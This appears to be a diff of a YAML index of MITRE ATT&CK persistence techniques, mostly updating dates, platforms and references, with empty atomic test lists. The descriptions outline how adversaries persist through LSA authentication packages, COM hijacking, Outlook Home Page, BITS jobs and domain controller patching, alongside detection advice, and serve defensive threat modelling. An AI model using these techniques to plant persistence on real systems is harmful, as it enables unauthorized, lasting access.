+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -33663,7 +34072,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33686,12 +34095,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -33769,41 +34177,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33812,27 +34190,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -33893,7 +34298,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -33937,7 +34341,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -33959,7 +34363,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34040,7 +34443,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34063,7 +34465,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34093,12 +34495,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34188,12 +34588,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34278,7 +34677,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34343,18 +34741,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34387,10 +34784,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34427,7 +34823,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34501,7 +34896,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34529,12 +34924,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -34593,33 +34987,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34640,6 +35011,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -34654,52 +35026,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -34721,6 +35083,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -34731,23 +35094,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34764,7 +35154,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -34823,7 +35213,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -34905,7 +35294,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35020,12 +35408,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35048,16 +35435,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35084,7 +35470,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35153,7 +35538,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35189,7 +35573,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35208,12 +35592,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35263,12 +35646,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35301,9 +35683,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35320,9 +35703,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35368,12 +35750,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35387,7 +35768,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35446,7 +35827,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35472,7 +35852,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35498,13 +35878,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
